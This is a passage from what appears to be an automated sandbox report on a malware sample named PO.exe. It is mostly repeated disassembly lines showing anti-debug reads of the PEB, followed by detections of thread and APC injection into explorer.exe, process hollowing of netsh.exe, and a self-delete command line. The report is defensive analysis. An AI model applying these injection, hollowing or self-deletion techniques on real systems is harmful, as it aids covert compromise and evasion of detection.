          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9240 mov eax, dword ptr fs:[00000030h]16_2_036C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9240 mov eax, dword ptr fs:[00000030h]16_2_036C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9240 mov eax, dword ptr fs:[00000030h]16_2_036C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9240 mov eax, dword ptr fs:[00000030h]16_2_036C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D7E41 mov eax, dword ptr fs:[00000030h]16_2_036D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0377FE3F mov eax, dword ptr fs:[00000030h]16_2_0377FE3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CE620 mov eax, dword ptr fs:[00000030h]16_2_036CE620
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03704A2C mov eax, dword ptr fs:[00000030h]16_2_03704A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03704A2C mov eax, dword ptr fs:[00000030h]16_2_03704A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D8A0A mov eax, dword ptr fs:[00000030h]16_2_036D8A0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CC600 mov eax, dword ptr fs:[00000030h]16_2_036CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CC600 mov eax, dword ptr fs:[00000030h]16_2_036CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CC600 mov eax, dword ptr fs:[00000030h]16_2_036CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F8E00 mov eax, dword ptr fs:[00000030h]16_2_036F8E00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781608 mov eax, dword ptr fs:[00000030h]16_2_03781608
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E3A1C mov eax, dword ptr fs:[00000030h]16_2_036E3A1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA61C mov eax, dword ptr fs:[00000030h]16_2_036FA61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA61C mov eax, dword ptr fs:[00000030h]16_2_036FA61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CAA16 mov eax, dword ptr fs:[00000030h]16_2_036CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CAA16 mov eax, dword ptr fs:[00000030h]16_2_036CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C5210 mov eax, dword ptr fs:[00000030h]16_2_036C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C5210 mov ecx, dword ptr fs:[00000030h]16_2_036C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C5210 mov eax, dword ptr fs:[00000030h]16_2_036C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C5210 mov eax, dword ptr fs:[00000030h]16_2_036C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2AE4 mov eax, dword ptr fs:[00000030h]16_2_036F2AE4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F16E0 mov ecx, dword ptr fs:[00000030h]16_2_036F16E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D76E2 mov eax, dword ptr fs:[00000030h]16_2_036D76E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F36CC mov eax, dword ptr fs:[00000030h]16_2_036F36CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2ACB mov eax, dword ptr fs:[00000030h]16_2_036F2ACB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798ED6 mov eax, dword ptr fs:[00000030h]16_2_03798ED6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0377FEC0 mov eax, dword ptr fs:[00000030h]16_2_0377FEC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03708EC7 mov eax, dword ptr fs:[00000030h]16_2_03708EC7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C52A5 mov eax, dword ptr fs:[00000030h]16_2_036C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C52A5 mov eax, dword ptr fs:[00000030h]16_2_036C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C52A5 mov eax, dword ptr fs:[00000030h]16_2_036C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C52A5 mov eax, dword ptr fs:[00000030h]16_2_036C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C52A5 mov eax, dword ptr fs:[00000030h]16_2_036C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037446A7 mov eax, dword ptr fs:[00000030h]16_2_037446A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03790EA5 mov eax, dword ptr fs:[00000030h]16_2_03790EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03790EA5 mov eax, dword ptr fs:[00000030h]16_2_03790EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03790EA5 mov eax, dword ptr fs:[00000030h]16_2_03790EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DAAB0 mov eax, dword ptr fs:[00000030h]16_2_036DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DAAB0 mov eax, dword ptr fs:[00000030h]16_2_036DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FFAB0 mov eax, dword ptr fs:[00000030h]16_2_036FFAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375FE87 mov eax, dword ptr fs:[00000030h]16_2_0375FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FD294 mov eax, dword ptr fs:[00000030h]16_2_036FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FD294 mov eax, dword ptr fs:[00000030h]16_2_036FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CC962 mov eax, dword ptr fs:[00000030h]16_2_036CC962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EC577 mov eax, dword ptr fs:[00000030h]16_2_036EC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EC577 mov eax, dword ptr fs:[00000030h]16_2_036EC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CB171 mov eax, dword ptr fs:[00000030h]16_2_036CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CB171 mov eax, dword ptr fs:[00000030h]16_2_036CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EB944 mov eax, dword ptr fs:[00000030h]16_2_036EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EB944 mov eax, dword ptr fs:[00000030h]16_2_036EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03703D43 mov eax, dword ptr fs:[00000030h]16_2_03703D43
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03743540 mov eax, dword ptr fs:[00000030h]16_2_03743540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E7D50 mov eax, dword ptr fs:[00000030h]16_2_036E7D50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0374A537 mov eax, dword ptr fs:[00000030h]16_2_0374A537
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798D34 mov eax, dword ptr fs:[00000030h]16_2_03798D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E4120 mov eax, dword ptr fs:[00000030h]16_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E4120 mov eax, dword ptr fs:[00000030h]16_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E4120 mov eax, dword ptr fs:[00000030h]16_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E4120 mov eax, dword ptr fs:[00000030h]16_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E4120 mov ecx, dword ptr fs:[00000030h]16_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4D3B mov eax, dword ptr fs:[00000030h]16_2_036F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4D3B mov eax, dword ptr fs:[00000030h]16_2_036F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4D3B mov eax, dword ptr fs:[00000030h]16_2_036F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F513A mov eax, dword ptr fs:[00000030h]16_2_036F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F513A mov eax, dword ptr fs:[00000030h]16_2_036F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D3D34 mov eax, dword ptr fs:[00000030h]16_2_036D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CAD30 mov eax, dword ptr fs:[00000030h]16_2_036CAD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9100 mov eax, dword ptr fs:[00000030h]16_2_036C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9100 mov eax, dword ptr fs:[00000030h]16_2_036C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9100 mov eax, dword ptr fs:[00000030h]16_2_036C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03778DF1 mov eax, dword ptr fs:[00000030h]16_2_03778DF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CB1E1 mov eax, dword ptr fs:[00000030h]16_2_036CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CB1E1 mov eax, dword ptr fs:[00000030h]16_2_036CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CB1E1 mov eax, dword ptr fs:[00000030h]16_2_036CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DD5E0 mov eax, dword ptr fs:[00000030h]16_2_036DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DD5E0 mov eax, dword ptr fs:[00000030h]16_2_036DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037541E8 mov eax, dword ptr fs:[00000030h]16_2_037541E8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov eax, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov eax, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov eax, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov ecx, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov eax, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746DC9 mov eax, dword ptr fs:[00000030h]16_2_03746DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037451BE mov eax, dword ptr fs:[00000030h]16_2_037451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037451BE mov eax, dword ptr fs:[00000030h]16_2_037451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037451BE mov eax, dword ptr fs:[00000030h]16_2_037451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037451BE mov eax, dword ptr fs:[00000030h]16_2_037451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F35A1 mov eax, dword ptr fs:[00000030h]16_2_036F35A1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F61A0 mov eax, dword ptr fs:[00000030h]16_2_036F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F61A0 mov eax, dword ptr fs:[00000030h]16_2_036F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037469A6 mov eax, dword ptr fs:[00000030h]16_2_037469A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037905AC mov eax, dword ptr fs:[00000030h]16_2_037905AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037905AC mov eax, dword ptr fs:[00000030h]16_2_037905AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F1DB5 mov eax, dword ptr fs:[00000030h]16_2_036F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F1DB5 mov eax, dword ptr fs:[00000030h]16_2_036F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F1DB5 mov eax, dword ptr fs:[00000030h]16_2_036F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C2D8A mov eax, dword ptr fs:[00000030h]16_2_036C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C2D8A mov eax, dword ptr fs:[00000030h]16_2_036C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C2D8A mov eax, dword ptr fs:[00000030h]16_2_036C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C2D8A mov eax, dword ptr fs:[00000030h]16_2_036C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C2D8A mov eax, dword ptr fs:[00000030h]16_2_036C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA185 mov eax, dword ptr fs:[00000030h]16_2_036FA185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EC182 mov eax, dword ptr fs:[00000030h]16_2_036EC182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2581 mov eax, dword ptr fs:[00000030h]16_2_036F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2581 mov eax, dword ptr fs:[00000030h]16_2_036F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2581 mov eax, dword ptr fs:[00000030h]16_2_036F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2581 mov eax, dword ptr fs:[00000030h]16_2_036F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FFD9B mov eax, dword ptr fs:[00000030h]16_2_036FFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FFD9B mov eax, dword ptr fs:[00000030h]16_2_036FFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2990 mov eax, dword ptr fs:[00000030h]16_2_036F2990
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E746D mov eax, dword ptr fs:[00000030h]16_2_036E746D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03782073 mov eax, dword ptr fs:[00000030h]16_2_03782073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03791074 mov eax, dword ptr fs:[00000030h]16_2_03791074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA44B mov eax, dword ptr fs:[00000030h]16_2_036FA44B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375C450 mov eax, dword ptr fs:[00000030h]16_2_0375C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375C450 mov eax, dword ptr fs:[00000030h]16_2_0375C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E0050 mov eax, dword ptr fs:[00000030h]16_2_036E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E0050 mov eax, dword ptr fs:[00000030h]16_2_036E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F002D mov eax, dword ptr fs:[00000030h]16_2_036F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F002D mov eax, dword ptr fs:[00000030h]16_2_036F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F002D mov eax, dword ptr fs:[00000030h]16_2_036F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F002D mov eax, dword ptr fs:[00000030h]16_2_036F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F002D mov eax, dword ptr fs:[00000030h]16_2_036F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FBC2C mov eax, dword ptr fs:[00000030h]16_2_036FBC2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DB02A mov eax, dword ptr fs:[00000030h]16_2_036DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DB02A mov eax, dword ptr fs:[00000030h]16_2_036DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DB02A mov eax, dword ptr fs:[00000030h]16_2_036DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DB02A mov eax, dword ptr fs:[00000030h]16_2_036DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747016 mov eax, dword ptr fs:[00000030h]16_2_03747016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747016 mov eax, dword ptr fs:[00000030h]16_2_03747016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747016 mov eax, dword ptr fs:[00000030h]16_2_03747016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03794015 mov eax, dword ptr fs:[00000030h]16_2_03794015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03794015 mov eax, dword ptr fs:[00000030h]16_2_03794015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0379740D mov eax, dword ptr fs:[00000030h]16_2_0379740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0379740D mov eax, dword ptr fs:[00000030h]16_2_0379740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0379740D mov eax, dword ptr fs:[00000030h]16_2_0379740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03781C06 mov eax, dword ptr fs:[00000030h]16_2_03781C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746C0A mov eax, dword ptr fs:[00000030h]16_2_03746C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746C0A mov eax, dword ptr fs:[00000030h]16_2_03746C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746C0A mov eax, dword ptr fs:[00000030h]16_2_03746C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746C0A mov eax, dword ptr fs:[00000030h]16_2_03746C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C58EC mov eax, dword ptr fs:[00000030h]16_2_036C58EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037814FB mov eax, dword ptr fs:[00000030h]16_2_037814FB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746CF0 mov eax, dword ptr fs:[00000030h]16_2_03746CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746CF0 mov eax, dword ptr fs:[00000030h]16_2_03746CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03746CF0 mov eax, dword ptr fs:[00000030h]16_2_03746CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov eax, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov ecx, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov eax, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov eax, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov eax, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375B8D0 mov eax, dword ptr fs:[00000030h]16_2_0375B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798CD6 mov eax, dword ptr fs:[00000030h]16_2_03798CD6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A0 mov eax, dword ptr fs:[00000030h]16_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FF0BF mov ecx, dword ptr fs:[00000030h]16_2_036FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FF0BF mov eax, dword ptr fs:[00000030h]16_2_036FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FF0BF mov eax, dword ptr fs:[00000030h]16_2_036FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037090AF mov eax, dword ptr fs:[00000030h]16_2_037090AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C9080 mov eax, dword ptr fs:[00000030h]16_2_036C9080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03743884 mov eax, dword ptr fs:[00000030h]16_2_03743884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03743884 mov eax, dword ptr fs:[00000030h]16_2_03743884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D849B mov eax, dword ptr fs:[00000030h]16_2_036D849B
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: D90000Jump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000002.484389821.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.271617096.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000010.00000002.492076136.0000000004EA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.271617096.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000010.00000002.492076136.0000000004EA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.271617096.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000010.00000002.492076136.0000000004EA0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.271617096.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000010.00000002.492076136.0000000004EA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
